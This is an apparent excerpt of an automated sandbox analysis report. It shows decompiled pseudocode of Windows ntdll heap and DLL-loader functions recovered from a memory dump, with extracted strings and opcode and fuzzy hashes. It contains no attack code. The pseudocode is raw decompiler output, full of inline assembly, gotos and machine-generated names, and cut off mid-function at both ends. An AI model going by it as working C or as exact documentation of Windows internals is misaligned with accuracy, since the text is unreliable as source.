                                          									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
                                          									_t168 = _t167 << 2;
                                          									_v40 = _t168;
                                          									_t206 = _v44;
                                          									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
                                          									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
                                          										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
                                          									}
                                          									_t217 = _v16;
                                          									if(_t217 != 0) {
                                          										_t173 = _t217 - 8;
                                          										_v52 = _t173;
                                          										_t174 =  *_t173;
                                          										__eflags =  *(_t206 + 0x4c);
                                          										if( *(_t206 + 0x4c) != 0) {
                                          											_t245 =  *(_t206 + 0x50) ^ _t174;
                                          											_v36 = _t245;
                                          											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
                                          											__eflags = _t245 >> 0x18 - _t225;
                                          											if(_t245 >> 0x18 != _t225) {
                                          												_push(_t225);
                                          												E00ECA80D(_t206, _v52, 0, 0);
                                          											}
                                          											_t174 = _v36;
                                          											_t217 = _v16;
                                          											_t242 = _v32;
                                          										}
                                          										_v28 = _v28 - (_t174 & 0x0000ffff);
                                          										__eflags = _v28;
                                          										if(_v28 > 0) {
                                          											goto L34;
                                          										} else {
                                          											goto L33;
                                          										}
                                          									} else {
                                          										L33:
                                          										_t58 = _t256 + 8; // -16
                                          										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
                                          										_t206 = _v44;
                                          										_t217 = _v16;
                                          										L34:
                                          										if(_t217 == 0) {
                                          											asm("bts eax, edx");
                                          										}
                                          										goto L36;
                                          									}
                                          								} else {
                                          									goto L24;
                                          								}
                                          								while(1) {
                                          									L24:
                                          									_t182 =  *_t255;
                                          									if(_t182 == 0) {
                                          										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
                                          										__eflags = _t216;
                                          										goto L28;
                                          									}
                                          									_t255 = _t182;
                                          									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
                                          										continue;
                                          									} else {
                                          										goto L28;
                                          									}
                                          								}
                                          								goto L28;
                                          							}
                                          						}
                                          					}
                                          					L39:
                                          				} while (_t235 != 0);
                                          				_t214 = _v12;
                                          				_t131 =  *(_t206 + 0x54) ^ _t214;
                                          				 *(_t256 + 4) = _t131;
                                          				if(_t214 == 0) {
                                          					__eflags =  *0xef8748 - 1;
                                          					if( *0xef8748 >= 1) {
                                          						_t127 = _t256 + 0xfff; // 0xfff
                                          						_t131 = _t127 & 0xfffff000;
                                          						__eflags = _t131 - _t256;
                                          						if(_t131 != _t256) {
                                          							_t156 =  *[fs:0x30];
                                          							__eflags =  *(_t156 + 0xc);
                                          							if( *(_t156 + 0xc) == 0) {
                                          								_push("HEAP: ");
                                          								E00E0B150();
                                          							} else {
                                          								E00E0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          							}
                                          							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
                                          							_t131 = E00E0B150();
                                          							__eflags =  *0xef7bc8;
                                          							if(__eflags == 0) {
                                          								_t131 = E00EC2073(_t206, 1, _t251, __eflags);
                                          							}
                                          						}
                                          					}
                                          				}
                                          				goto L41;
                                          			}

                                          Strings
                                          • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 00E72403
                                          • HEAP[%wZ]: , xrefs: 00E722D7, 00E723E7
                                          • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 00E722F3
                                          • HEAP: , xrefs: 00E722E6, 00E723F6
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                          • API String ID: 0-1657114761
                                          • Opcode ID: ec11e0ca889c839cfb428bfe02e7b1675e33b4f5438881306d78a20ad73bdbfd
                                          • Instruction ID: 92b9543052a8d5ccd3ed9488a79923e51a71a8fbfeabb631db0e11f5a9586e2c
                                          • Opcode Fuzzy Hash: ec11e0ca889c839cfb428bfe02e7b1675e33b4f5438881306d78a20ad73bdbfd
                                          • Instruction Fuzzy Hash: E3D1D070A002559FDB18CF69D590BBAB7F1FF88304F18A17DD85AAB341E334A885CB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 69%
                                          			E00E2A229(void* __ecx, void* __edx) {
                                          				signed int _v20;
                                          				char _v24;
                                          				char _v28;
                                          				void* _v44;
                                          				void* _v48;
                                          				void* _v56;
                                          				void* _v60;
                                          				void* __ebx;
                                          				signed int _t55;
                                          				signed int _t57;
                                          				void* _t61;
                                          				intOrPtr _t62;
                                          				void* _t65;
                                          				void* _t71;
                                          				signed char* _t74;
                                          				intOrPtr _t75;
                                          				signed char* _t80;
                                          				intOrPtr _t81;
                                          				void* _t82;
                                          				signed char* _t85;
                                          				signed char _t91;
                                          				void* _t103;
                                          				void* _t105;
                                          				void* _t121;
                                          				void* _t129;
                                          				signed int _t131;
                                          				void* _t133;
                                          
                                          				_t105 = __ecx;
                                          				_t133 = (_t131 & 0xfffffff8) - 0x1c;
                                          				_t103 = __edx;
                                          				_t129 = __ecx;
                                          				E00E2DF24(__edx,  &_v28, _t133);
                                          				_t55 =  *(_t129 + 0x40) & 0x00040000;
                                          				asm("sbb edi, edi");
                                          				_t121 = ( ~_t55 & 0x0000003c) + 4;
                                          				if(_t55 != 0) {
                                          					_push(0);
                                          					_push(0x14);
                                          					_push( &_v24);
                                          					_push(3);
                                          					_push(_t129);
                                          					_push(0xffffffff);
                                          					_t57 = E00E49730();
                                          					__eflags = _t57;
                                          					if(_t57 < 0) {
                                          						L17:
                                          						_push(_t105);
                                          						E00ECA80D(_t129, 1, _v20, 0);
                                          						_t121 = 4;
                                          						goto L1;
                                          					}
                                          					__eflags = _v20 & 0x00000060;
                                          					if((_v20 & 0x00000060) == 0) {
                                          						goto L17;
                                          					}
                                          					__eflags = _v24 - _t129;
                                          					if(_v24 == _t129) {
                                          						goto L1;
                                          					}
                                          					goto L17;
                                          				}
                                          				L1:
                                          				_push(_t121);
                                          				_push(0x1000);
                                          				_push(_t133 + 0x14);
                                          				_push(0);
                                          				_push(_t133 + 0x20);
                                          				_push(0xffffffff);
                                          				_t61 = E00E49660();
                                          				_t122 = _t61;
                                          				if(_t61 < 0) {
                                          					_t62 =  *[fs:0x30];
                                          					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
                                          					__eflags =  *(_t62 + 0xc);
                                          					if( *(_t62 + 0xc) == 0) {
                                          						_push("HEAP: ");
                                          						E00E0B150();
                                          					} else {
                                          						E00E0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          					}
                                          					_push( *((intOrPtr*)(_t133 + 0xc)));
                                          					_push( *((intOrPtr*)(_t133 + 0x14)));
                                          					_push(_t129);
                                          					E00E0B150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
                                          					_t65 = 0;
                                          					L13:
                                          					return _t65;
                                          				}
                                          				_t71 = E00E27D50();
                                          				_t124 = 0x7ffe0380;
                                          				if(_t71 != 0) {
                                          					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          				} else {
                                          					_t74 = 0x7ffe0380;
                                          				}
                                          				if( *_t74 != 0) {
                                          					_t75 =  *[fs:0x30];
                                          					__eflags =  *(_t75 + 0x240) & 0x00000001;
                                          					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
                                          						E00EC138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
                                          					}
                                          				}
                                          				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
                                          				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
                                          				if(E00E27D50() != 0) {
                                          					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          				} else {
                                          					_t80 = _t124;
                                          				}
                                          				if( *_t80 != 0) {
                                          					_t81 =  *[fs:0x30];
                                          					__eflags =  *(_t81 + 0x240) & 0x00000001;
                                          					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
                                          						__eflags = E00E27D50();
                                          						if(__eflags != 0) {
                                          							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          						}
                                          						E00EC1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
                                          					}
                                          				}
                                          				_t82 = E00E27D50();
                                          				_t125 = 0x7ffe038a;
                                          				if(_t82 != 0) {
                                          					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                          				} else {
                                          					_t85 = 0x7ffe038a;
                                          				}
                                          				if( *_t85 != 0) {
                                          					__eflags = E00E27D50();
                                          					if(__eflags != 0) {
                                          						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                          						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                          					}
                                          					E00EC1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
                                          				}
                                          				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
                                          				_t91 =  *(_t103 + 2);
                                          				if((_t91 & 0x00000004) != 0) {
                                          					E00E5D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
                                          					_t91 =  *(_t103 + 2);
                                          				}
                                          				 *(_t103 + 2) = _t91 & 0x00000017;
                                          				_t65 = 1;
                                          				goto L13;
                                          			}































                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                          • API String ID: 2994545307-2586055223
                                          • Opcode ID: e51c537f197a81b55adc8c1ebf166a6010b3bbc51bc4cad21c549db0740c1259
                                          • Instruction ID: b124edf28785f0f3708ecbdd2373e1a4718cf3aa4c3baf9dd049f335ede5c7ea
                                          • Opcode Fuzzy Hash: e51c537f197a81b55adc8c1ebf166a6010b3bbc51bc4cad21c549db0740c1259
                                          • Instruction Fuzzy Hash: 6E5135322047809FD322DB68D845F67B7E8FF80B54F1954A8F595AB2A2D734DC04CB22
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 44%
                                          			E00E38E00(void* __ecx) {
                                          				signed int _v8;
                                          				char _v12;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				intOrPtr* _t32;
                                          				intOrPtr _t35;
                                          				intOrPtr _t43;
                                          				void* _t46;
                                          				intOrPtr _t47;
                                          				void* _t48;
                                          				signed int _t49;
                                          				void* _t50;
                                          				intOrPtr* _t51;
                                          				signed int _t52;
                                          				void* _t53;
                                          				intOrPtr _t55;
                                          
                                          				_v8 =  *0xefd360 ^ _t52;
                                          				_t49 = 0;
                                          				_t48 = __ecx;
                                          				_t55 =  *0xef8464; // 0x74b10110
                                          				if(_t55 == 0) {
                                          					L9:
                                          					if( !_t49 >= 0) {
                                          						if(( *0xef5780 & 0x00000003) != 0) {
                                          							E00E85510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                          						}
                                          						if(( *0xef5780 & 0x00000010) != 0) {
                                          							asm("int3");
                                          						}
                                          					}
                                          					return E00E4B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                          				}
                                          				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                          				_t43 =  *0xef7984; // 0x9b2af8
                                          				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                          					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                          					if(_t48 == _t43) {
                                          						_t50 = 0x5c;
                                          						if( *_t32 == _t50) {
                                          							_t46 = 0x3f;
                                          							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                          								_t32 = _t32 + 8;
                                          							}
                                          						}
                                          					}
                                          					_t51 =  *0xef8464; // 0x74b10110
                                          					 *0xefb1e0(_t47, _t32,  &_v12);
                                          					_t49 =  *_t51();
                                          					if(_t49 >= 0) {
                                          						L8:
                                          						_t35 = _v12;
                                          						if(_t35 != 0) {
                                          							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                          								E00E39B10( *((intOrPtr*)(_t48 + 0x48)));
                                          								_t35 = _v12;
                                          							}
                                          							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                          						}
                                          						goto L9;
                                          					}
                                          					if(_t49 != 0xc000008a) {
                                          						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                          							if(_t49 != 0xc00000bb) {
                                          								goto L8;
                                          							}
                                          						}
                                          					}
                                          					if(( *0xef5780 & 0x00000005) != 0) {
                                          						_push(_t49);
                                          						E00E85510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                          						_t53 = _t53 + 0x1c;
                                          					}
                                          					_t49 = 0;
                                          					goto L8;
                                          				} else {
                                          					goto L9;
                                          				}
                                          			}





















                                          Strings
                                          • minkernel\ntdll\ldrsnap.c, xrefs: 00E7933B, 00E79367
                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 00E7932A
                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 00E79357
                                          • LdrpFindDllActivationContext, xrefs: 00E79331, 00E7935D
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                          • API String ID: 0-3779518884
                                          • Opcode ID: 400a3f8a95f2ef93953e8fc1c7dfb55eca45b92354f83dac5dd47a1b71d9bcce
                                          • Instruction ID: 1f674a90a9d56d6f0981a42e3084efe4e56c916345e73be1cbb1bab07c88d7c5
                                          • Opcode Fuzzy Hash: 400a3f8a95f2ef93953e8fc1c7dfb55eca45b92354f83dac5dd47a1b71d9bcce
                                          • Instruction Fuzzy Hash: F3411932A003119FDB25AB178E4DA75BFB5AB5034CF06616AF858771A1EF70AD84C381
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                          • API String ID: 2994545307-336120773
                                          • Opcode ID: c9a2dfd41446f595e78774d4040e4b058b6ce13a0a46ff6f1562351a2e7d0732
                                          • Instruction ID: 9e9ca7a07eedac42e157bf129fa87bcbad660e24e8cab9fd9631165e81ef90c7
                                          • Opcode Fuzzy Hash: c9a2dfd41446f595e78774d4040e4b058b6ce13a0a46ff6f1562351a2e7d0732
                                          • Instruction Fuzzy Hash: 013122B5280240EFC310EB58C9A5F67B3E8FF04724F245069F805FB2D1E672AC85C668
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 83%
                                          			E00E18794(void* __ecx) {
                                          				signed int _v0;
                                          				char _v8;
                                          				signed int _v12;
                                          				void* _v16;
                                          				signed int _v20;
                                          				intOrPtr _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				signed int _v40;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* __ebp;
                                          				intOrPtr* _t77;
                                          				signed int _t80;
                                          				signed char _t81;
                                          				signed int _t87;
                                          				signed int _t91;
                                          				void* _t92;
                                          				void* _t94;
                                          				signed int _t95;
                                          				signed int _t103;
                                          				signed int _t105;
                                          				signed int _t110;
                                          				signed int _t118;
                                          				intOrPtr* _t121;
                                          				intOrPtr _t122;
                                          				signed int _t125;
                                          				signed int _t129;
                                          				signed int _t131;
                                          				signed int _t134;
                                          				signed int _t136;
                                          				signed int _t143;
                                          				signed int* _t147;
                                          				signed int _t151;
                                          				void* _t153;
                                          				signed int* _t157;
                                          				signed int _t159;
                                          				signed int _t161;
                                          				signed int _t166;
                                          				signed int _t168;
                                          
                                          				_push(__ecx);
                                          				_t153 = __ecx;
                                          				_t159 = 0;
                                          				_t121 = __ecx + 0x3c;
                                          				if( *_t121 == 0) {
                                          					L2:
                                          					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                          					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                          						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                          						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                          						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                          							L6:
                                          							if(E00E1934A() != 0) {
                                          								_t159 = E00E8A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                          								__eflags = _t159;
                                          								if(_t159 < 0) {
                                          									_t81 =  *0xef5780; // 0x0
                                          									__eflags = _t81 & 0x00000003;
                                          									if((_t81 & 0x00000003) != 0) {
                                          										_push(_t159);
                                          										E00E85510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                          										_t81 =  *0xef5780; // 0x0
                                          									}
                                          									__eflags = _t81 & 0x00000010;
                                          									if((_t81 & 0x00000010) != 0) {
                                          										asm("int3");
                                          									}
                                          								}
                                          							}
                                          						} else {
                                          							_t159 = E00E1849B(0, _t122, _t153, _t159, _t180);
                                          							if(_t159 >= 0) {
                                          								goto L6;
                                          							}
                                          						}
                                          						_t80 = _t159;
                                          						goto L8;
                                          					} else {
                                          						_t125 = 0x13;
                                          						asm("int 0x29");
                                          						_push(0);
                                          						_push(_t159);
                                          						_t161 = _t125;
                                          						_t87 =  *( *[fs:0x30] + 0x1e8);
                                          						_t143 = 0;
                                          						_v40 = _t161;
                                          						_t118 = 0;
                                          						_push(_t153);
                                          						__eflags = _t87;
                                          						if(_t87 != 0) {
                                          							_t118 = _t87 + 0x5d8;
                                          							__eflags = _t118;
                                          							if(_t118 == 0) {
                                          								L46:
                                          								_t118 = 0;
                                          							} else {
                                          								__eflags =  *(_t118 + 0x30);
                                          								if( *(_t118 + 0x30) == 0) {
                                          									goto L46;
                                          								}
                                          							}
                                          						}
                                          						_v32 = 0;
                                          						_v28 = 0;
                                          						_v16 = 0;
                                          						_v20 = 0;
                                          						_v12 = 0;
                                          						__eflags = _t118;
                                          						if(_t118 != 0) {
                                          							__eflags = _t161;
                                          							if(_t161 != 0) {
                                          								__eflags =  *(_t118 + 8);
                                          								if( *(_t118 + 8) == 0) {
                                          									L22:
                                          									_t143 = 1;
                                          									__eflags = 1;
                                          								} else {
                                          									_t19 = _t118 + 0x40; // 0x40
                                          									_t156 = _t19;
                                          									E00E18999(_t19,  &_v16);
                                          									__eflags = _v0;
                                          									if(_v0 != 0) {
                                          										__eflags = _v0 - 1;
                                          										if(_v0 != 1) {
                                          											goto L22;
                                          										} else {
                                          											_t128 =  *(_t161 + 0x64);
                                          											__eflags =  *(_t161 + 0x64);
                                          											if( *(_t161 + 0x64) == 0) {
                                          												goto L22;
                                          											} else {
                                          												E00E18999(_t128,  &_v12);
                                          												_t147 = _v12;
                                          												_t91 = 0;
                                          												__eflags = 0;
                                          												_t129 =  *_t147;
                                          												while(1) {
                                          													__eflags =  *((intOrPtr*)(0xef5c60 + _t91 * 8)) - _t129;
                                          													if( *((intOrPtr*)(0xef5c60 + _t91 * 8)) == _t129) {
                                          														break;
                                          													}
                                          													_t91 = _t91 + 1;
                                          													__eflags = _t91 - 5;
                                          													if(_t91 < 5) {
                                          														continue;
                                          													} else {
                                          														_t131 = 0;
                                          														__eflags = 0;
                                          													}
                                          													L37:
                                          													__eflags = _t131;
                                          													if(_t131 != 0) {
                                          														goto L22;
                                          													} else {
                                          														__eflags = _v16 - _t147;
                                          														if(_v16 != _t147) {
                                          															goto L22;
                                          														} else {
                                          															E00E22280(_t92, 0xef86cc);
                                          															_t94 = E00ED9DFB( &_v20);
                                          															__eflags = _t94 - 1;
                                          															if(_t94 != 1) {
                                          															}
                                          															asm("movsd");
                                          															asm("movsd");
                                          															asm("movsd");
                                          															asm("movsd");
                                          															 *_t118 =  *_t118 + 1;
                                          															asm("adc dword [ebx+0x4], 0x0");
                                          															_t95 = E00E361A0( &_v32);
                                          															__eflags = _t95;
                                          															if(_t95 != 0) {
                                          																__eflags = _v32 | _v28;
                                          																if((_v32 | _v28) != 0) {
                                          																	_t71 = _t118 + 0x40; // 0x3f
                                          																	_t134 = _t71;
                                          																	goto L55;
                                          																}
                                          															}
                                          															goto L30;
                                          														}
                                          													}
                                          													goto L56;
                                          												}
                                          												_t92 = 0xef5c64 + _t91 * 8;
                                          												asm("lock xadd [eax], ecx");
                                          												_t131 = (_t129 | 0xffffffff) - 1;
                                          												goto L37;
                                          											}
                                          										}
                                          										goto L56;
                                          									} else {
                                          										_t143 = E00E18A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                          										__eflags = _t143;
                                          										if(_t143 != 0) {
                                          											_t157 = _v12;
                                          											_t103 = 0;
                                          											__eflags = 0;
                                          											_t136 =  &(_t157[1]);
                                          											 *(_t161 + 0x64) = _t136;
                                          											_t151 =  *_t157;
                                          											_v20 = _t136;
                                          											while(1) {
                                          												__eflags =  *((intOrPtr*)(0xef5c60 + _t103 * 8)) - _t151;
                                          												if( *((intOrPtr*)(0xef5c60 + _t103 * 8)) == _t151) {
                                          													break;
                                          												}
                                          												_t103 = _t103 + 1;
                                          												__eflags = _t103 - 5;
                                          												if(_t103 < 5) {
                                          													continue;
                                          												}
                                          												L21:
                                          												_t105 = E00E4F380(_t136, 0xde1184, 0x10);
                                          												__eflags = _t105;
                                          												if(_t105 != 0) {
                                          													__eflags =  *_t157 -  *_v16;
                                          													if( *_t157 >=  *_v16) {
                                          														goto L22;
                                          													} else {
                                          														asm("cdq");
                                          														_t166 = _t157[5] & 0x0000ffff;
                                          														_t108 = _t157[5] & 0x0000ffff;
                                          														asm("cdq");
                                          														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                          														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                          														if(__eflags > 0) {
                                          															L29:
                                          															E00E22280(_t108, 0xef86cc);
                                          															 *_t118 =  *_t118 + 1;
                                          															_t42 = _t118 + 0x40; // 0x3f
                                          															_t156 = _t42;
                                          															asm("adc dword [ebx+0x4], 0x0");
                                          															asm("movsd");
                                          															asm("movsd");
                                          															asm("movsd");
                                          															asm("movsd");
                                          															_t110 = E00E361A0( &_v32);
                                          															__eflags = _t110;
                                          															if(_t110 != 0) {
                                          																__eflags = _v32 | _v28;
                                          																if((_v32 | _v28) != 0) {
                                          																	_t134 = _v20;
                                          																	L55:
                                          																	E00ED9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                          																}
                                          															}
                                          															L30:
                                          															 *_t118 =  *_t118 + 1;
                                          															asm("adc dword [ebx+0x4], 0x0");
                                          															E00E1FFB0(_t118, _t156, 0xef86cc);
                                          															goto L22;
                                          														} else {
                                          															if(__eflags < 0) {
                                          																goto L22;
                                          															} else {
                                          																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                          																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                          																	goto L22;
                                          																} else {
                                          																	goto L29;
                                          																}
                                          															}
                                          														}
                                          													}
                                          													goto L56;
                                          												}
                                          												goto L22;
                                          											}
                                          											asm("lock inc dword [eax]");
                                          											goto L21;
                                          										}
                                          									}
                                          								}
                                          							}
                                          						}
                                          						return _t143;
                                          					}
                                          				} else {
                                          					_push( &_v8);
                                          					_push( *((intOrPtr*)(__ecx + 0x50)));
                                          					_push(__ecx + 0x40);
                                          					_push(_t121);
                                          					_push(0xffffffff);
                                          					_t80 = E00E49A00();
                                          					_t159 = _t80;
                                          					if(_t159 < 0) {
                                          						L8:
                                          						return _t80;
                                          					} else {
                                          						goto L2;
                                          					}
                                          				}
                                          				L56:
                                          			}


                                          Strings
                                          • minkernel\ntdll\ldrsnap.c, xrefs: 00E69C28
                                          • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 00E69C18
                                          • LdrpDoPostSnapWork, xrefs: 00E69C1E
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                          • API String ID: 2994545307-1948996284
                                          • Opcode ID: 239dce006dcdb46c24ff6e9f460e7baaf5223e2b6a3c9ec0fde06c2598cef101
                                          • Instruction ID: 5d01f5f9723b0ece9bad93af5812f9bdffdb2bd8ee6cad27377fdda0de6bc9ae
                                          • Opcode Fuzzy Hash: 239dce006dcdb46c24ff6e9f460e7baaf5223e2b6a3c9ec0fde06c2598cef101
                                          • Instruction Fuzzy Hash: 51910431A002169FDF18DF59CA819FAB7B5FF84304B95616AE905BB291DF30ED81CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 98%
                                          			E00E17E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                          				char _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				char _v24;
                                          				signed int _t73;
                                          				void* _t77;
                                          				char* _t82;
                                          				char* _t87;
                                          				signed char* _t97;
                                          				signed char _t102;
                                          				intOrPtr _t107;
                                          				signed char* _t108;
                                          				intOrPtr _t112;
                                          				intOrPtr _t124;
                                          				intOrPtr _t125;
                                          				intOrPtr _t126;
                                          
                                          				_t107 = __edx;
                                          				_v12 = __ecx;
                                          				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                          				_t124 = 0;
                                          				_v20 = __edx;
                                          				if(E00E1CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                          					_t112 = _v8;
                                          				} else {
                                          					_t112 = 0;
                                          					_v8 = 0;
                                          				}
                                          				if(_t112 != 0) {
                                          					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                          						_t124 = 0xc000007b;
                                          						goto L8;
                                          					}
                                          					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                          					 *(_t125 + 0x34) = _t73;
                                          					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                          						goto L3;
                                          					}
                                          					 *(_t125 + 0x34) = _t73 | 0x01000000;
                                          					_t124 = E00E0C9A4( *((intOrPtr*)(_t125 + 0x18)));
                                          					if(_t124 < 0) {
                                          						goto L8;
                                          					} else {
                                          						goto L3;
                                          					}
                                          				} else {
                                          					L3:
                                          					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                          						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                          						L8:
                                          						return _t124;
                                          					}
                                          					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                          						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
